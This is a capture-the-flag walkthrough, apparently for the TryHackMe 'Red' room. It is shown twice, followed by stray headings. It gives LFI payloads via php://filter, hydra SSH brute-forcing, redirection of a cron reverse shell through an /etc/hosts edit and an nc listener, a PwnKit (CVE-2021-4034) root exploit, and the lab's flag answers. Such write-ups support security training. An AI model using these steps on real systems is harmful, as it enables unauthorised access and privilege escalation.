Red

A classic battle for the ages.

Scanning

scan the target

nmap -sS -sV -sC -T4 10.10.196.223

there are 2 open ports ssh and http

HTTP

check the webpage, you will see there is a parameter ?page=home.html

it appears for a Local File Inclusion (LFI) vulnerable

so i tried some payloads like ?page=../../../etc/passwd or ?page=....//....//....//etc/passwd are not work

for some research i found Exploiting Local File Inclusion (LFI) Using PHP Wrapper

?page=php://filter/resource=/etc/passwd

we see that 2 users on the machine call red & blue

Enumeration

i will use LFI Hunter to enummerate some interest files

git clone https://github.com/hadrian3689/lfi_hunter
cd lfi_hunter
python3 lfi_hunter.py -u 'http://10.10.196.223/index.php?page=' -l 'php://filter/resource=' -w unix.txt

it reveal a lot of information, but it found something interesting in blue's history

it seem blue has create a hashcat rule to build a password list from a .reminder file

?page=php://filter/resource=/home/blue/.reminder

so recreate the password list with the same command

echo 'sup3r_p@s$w0rd!' > pass.txt
hashcat --stdout pass.txt -r /usr/share/hashcat/rules/best64.rule > passlist.txt

Exploitation

so, let's bruteforce the password with hydra

hydra -l blue -P passlist.txt ssh://10.10.196.223

ssh to blue

ssh blue@10.10.196.223
sup3r_p@s$w0rd!23

Flag	flag1
Answer	THM{Is_thAt_all_y0u_can_d0_blU3}

i have a message from red, and got kicked out from the machine and blue's password change

try again

hydra -l blue -P passlist.txt ssh://10.10.196.223
# and ssh again with new password
ssh blue@10.10.196.223

there are a cronjob write annoying message, you can check it with pspy or just other simple way

ps aux

we see that it's a reverse shell command that is connecting to redrules.thm on port 9001 runs every minute

i decided to check the hosts file and see what is this domain

cat /etc/hosts

but we have read and write permission of it

echo '10.18.37.45 redrules.thm' >> /etc/hosts

nc -vlnp 9001

Flag	flag2
Answer	THM{Y0u_won't_mak3_IT_furTH3r_th@n_th1S}

Privilege Escalation

so we got the shell, upgrade it

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
Ctrl+Z
stty raw -echo; fg

find suid bit

find / -perm -u=s -type f 2>/dev/null

hmm, by some research i see it related to CVE-2021-4034

however, we don't have gcc or make installed

so find a exploit using python

git clone https://github.com/joeammond/CVE-2021-4034
cp CVE-2021-4034/CVE-2021-4034.py pwnkit.py
vi pwnkit.py

edit the location of pkexec on the script

python3 pwnkit.py

our final flag

Flag	flag3
Answer	THM{Go0d_Gam3_Blu3_GG}

Red

A classic battle for the ages.

Scanning

scan the target

nmap -sS -sV -sC -T4 10.10.196.223

there are 2 open ports ssh and http

HTTP

check the webpage, you will see there is a parameter ?page=home.html

it appears for a Local File Inclusion (LFI) vulnerable

so i tried some payloads like ?page=../../../etc/passwd or ?page=....//....//....//etc/passwd are not work

for some research i found Exploiting Local File Inclusion (LFI) Using PHP Wrapper

?page=php://filter/resource=/etc/passwd

we see that 2 users on the machine call red & blue

Enumeration

i will use LFI Hunter to enummerate some interest files

git clone https://github.com/hadrian3689/lfi_hunter
cd lfi_hunter
python3 lfi_hunter.py -u 'http://10.10.196.223/index.php?page=' -l 'php://filter/resource=' -w unix.txt

it reveal a lot of information, but it found something interesting in blue's history

it seem blue has create a hashcat rule to build a password list from a .reminder file

?page=php://filter/resource=/home/blue/.reminder

so recreate the password list with the same command

echo 'sup3r_p@s$w0rd!' > pass.txt
hashcat --stdout pass.txt -r /usr/share/hashcat/rules/best64.rule > passlist.txt

Exploitation

so, let's bruteforce the password with hydra

hydra -l blue -P passlist.txt ssh://10.10.196.223

ssh to blue

ssh blue@10.10.196.223
sup3r_p@s$w0rd!23

Flag	flag1
Answer	THM{Is_thAt_all_y0u_can_d0_blU3}

i have a message from red, and got kicked out from the machine and blue's password change

try again

hydra -l blue -P passlist.txt ssh://10.10.196.223
# and ssh again with new password
ssh blue@10.10.196.223

there are a cronjob write annoying message, you can check it with pspy or just other simple way

ps aux

we see that it's a reverse shell command that is connecting to redrules.thm on port 9001 runs every minute

i decided to check the hosts file and see what is this domain

cat /etc/hosts

but we have read and write permission of it

echo '10.18.37.45 redrules.thm' >> /etc/hosts

nc -vlnp 9001

Flag	flag2
Answer	THM{Y0u_won't_mak3_IT_furTH3r_th@n_th1S}

Privilege Escalation

so we got the shell, upgrade it

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
Ctrl+Z
stty raw -echo; fg

find suid bit

find / -perm -u=s -type f 2>/dev/null

hmm, by some research i see it related to CVE-2021-4034

however, we don't have gcc or make installed

so find a exploit using python

git clone https://github.com/joeammond/CVE-2021-4034
cp CVE-2021-4034/CVE-2021-4034.py pwnkit.py
vi pwnkit.py

edit the location of pkexec on the script

python3 pwnkit.py

our final flag

Flag	flag3
Answer	THM{Go0d_Gam3_Blu3_GG}

[Red](https://tryhackme.com/room/redisl33t)

Red

Scanning

HTTP

Enumeration

Exploitation

Privilege Escalation

[Red](https://tryhackme.com/room/redisl33t)

Red

Scanning

HTTP

Enumeration

Exploitation

Privilege Escalation